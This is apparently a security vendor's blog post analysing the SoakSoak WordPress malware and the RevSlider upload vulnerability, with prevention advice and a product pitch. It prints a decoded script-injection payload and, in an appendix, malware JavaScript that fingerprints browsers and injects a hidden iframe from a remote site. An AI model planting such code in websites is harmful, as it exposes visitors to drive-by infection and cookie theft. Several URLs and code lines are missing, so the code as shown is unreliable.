SoakSoak WordPress Malware – Deep Analysis


Dan Ennis CEO

Malware-SmallAs of the date of writing this post the SoakSoak WordPress malware has affected over 100,000 WordPress websites and resulted in over 11,000 domains being blacklisted by Google, as reported by Sucuri. This post provides a deep analysis of the malware’s behavior, suggested  actions and an update for users of the Sentrix Website security solution.

Are you vulnerable?

You may easily test whether your site is vulnerable by checking access to the following URL (replace yourdomain with your website domain):

A vulnerable site will return a configuration file containing sensitive information such as the database user name and password:

/** MySQL database username */define( ‘DB_USER’, XXXX ); /** MySQL database password */define( ‘DB_PASSWORD’, ‘XXXX’ );

An attacker can use this information to access the database directly, steal sensitive data, compromise data and deface the site.

SoakSoak and the RevSlider Vulnerability

According to Sucuri, the SoakSoak WordPress Malware may be correlated with a vulnerability in RevSlider, a WordPress slider plugin.

Sites using the RevSlider plugin are exposed to file uploads by non-legitimate users. The Attacker will be able to execute the following URL and upload malicious files:

The following script will then be uploaded:


When decoding the payload you will get the following result:
(function() { var head=document.getElementsByTagName(‘head’)[0]; var script=document.createElement(‘script’); script.type=’text/javascript’; script.src=’’;’xxyyzz_petushok’; head.appendChild(script); }());

This script adds a header element to the page, which will actually run a script in the context of the website. The above code references a script that was added to the header, the script is described in the appendix.

The attacker has now gained access allowing modifying the behavior of Google Ads in WordPress by injecting a script that uses the ads mechanism to collect cookies and send the data to the attacker as follows:


We classify this as an extremely severe attack, because its impact is not only on the data center but also on end users. As opposed to the data center, in case of  end-users it is much more difficult to manage the exposure and risk.

How to Avoid the Attack

These procedures can help in avoiding a SoakSoak attack:

  1. Follow recommendations to validate all input and sanitize all input 
  2. Block access to WP-admin and WP-content
  3. Do not allow file traversal
  4. Use caution while using plug-ins
    1. Do not use unknown plugins
    2. Do not expose plugin admin interfaces
    3. Review plugin code for security issues
  5. Review and follow WordPress hardening guidelines :

Sentrix Customers Status

Sentrix customers are not affected by the RevSlider vulnerability nor by the SoakSoak WordPress Malware. The Sentrix Core Engine only exposes URLs that should be accessed by legitimate users. Administration interfaces are not exposed.

For example: without Sentrix the following URL may be exposed to information leakage:

With Sentrix, however this URL will not be exposed as it not one that a legitimate user would access. This renders the underlying vulnerability useless.

Please keep me posted on your experience with the SoakSoak WordPress Malware, and feel free to contact me on LinkedIn or at


Appendix: Code Snippet

function BDN(cap) {    var uas = window.navigator.userAgent,        OperaB = /Opera[ \/]+\w+\.\w+/i,        OperaV = /Version[ \/]+\w+\.\w+/i,        FirefoxB = /Firefox\/\w+\.\w+/i,        ChromeB = /Chrome\/\w+\.\w+/i,        IEB = /MSIE *\d+\.\w+/i,        BRW = new Array(),        BRWSplit = /[ \/\.]/i,        OperaV = uas.match(OperaV),        Firefox = uas.match(FirefoxB),        Chrome = uas.match(ChromeB),        IE = uas.match(IEB),        Opera = uas.match(OperaB);    if ((!Opera == “”) & (!OperaV == “”)) BRW[0] = OperaV[0].replace(/Version/, “Opera”)    else if (!Opera == “”) BRW[0] = Opera[0]    else if (!IE == “”) BRW[0] = IE[0]    else if (!Firefox == “”) BRW[0] = Firefox[0]    else if (!Chrome == “”) BRW[0] = Chrome[0];    var outstr;    if (BRW[0] != null) outstr = BRW[0].split(BRWSplit);

    if ((cap == null) && (outstr != null)) {

        cap = outstr[2].length;

        outstr[2] = outstr[2].substring(0, cap);

        outstr[3] = ‘uncomn’;

        if (uas.indexOf(‘Windows’) != -1) outstr[3] = ‘Windows’;

        return (outstr);

    } else return (false);


function SVB() {

    var dtstr = BDN();

    if (dtstr[0]) {

 if ((dtstr[0] == ‘MSIE’ || dtstr[0] == ‘Firefox’ ) & dtstr[3] == ‘Windows’){

            var divTag = document.createElement(‘div’);

   = ‘goo’;


            var googlecode = document.createElement(‘iframe’);

            googlecode.src = ‘[]=1&rule[]=m1&www[]=db’;

            googlecode.width = ‘5px’;

            googlecode.height = ‘6px’;

            googlecode.setAttribute(‘style’, ‘visibility:hidden’);





function SCk(cnm, cValue, nDay, path) {

    var today = new Date();

    var exp = new Date();

    if (nDay == null || nDay == 0) nDay = 7;

    exp.setTime(today.getTime() + 3600000 * 24 * nDay);

    document.cookie = cnm + “=” + escape(cValue) + “;exps=” + exp.toGMTString() + ((path) ? “; path=” + path : “”);


function GCk(nm) {

    var start = document.cookie.indexOf(nm + “=”);

    var len = start + nm.length + 1;

    if ((!start) && (nm != document.cookie.substring(0, nm.length))) {

        return null;


    if (start == -1) return null;

    var end = document.cookie.indexOf(“;”, len);

    if (end == -1) end = document.cookie.length;

    return unescape(document.cookie.substring(len, end));


if (navigator.cookieEnabled) {

    if (GCk(‘MGHTRX’) == 12112014) {} else {

        SCk(‘MGHTRX’, ‘12112014’, ‘7’, ‘/’);

        if (document.loaded) {


        } else {

            if (window.addEventListener) {

                window.addEventListener(‘load’, SVB, false);

            } else {

                window.attachEvent(‘onload’, SVB);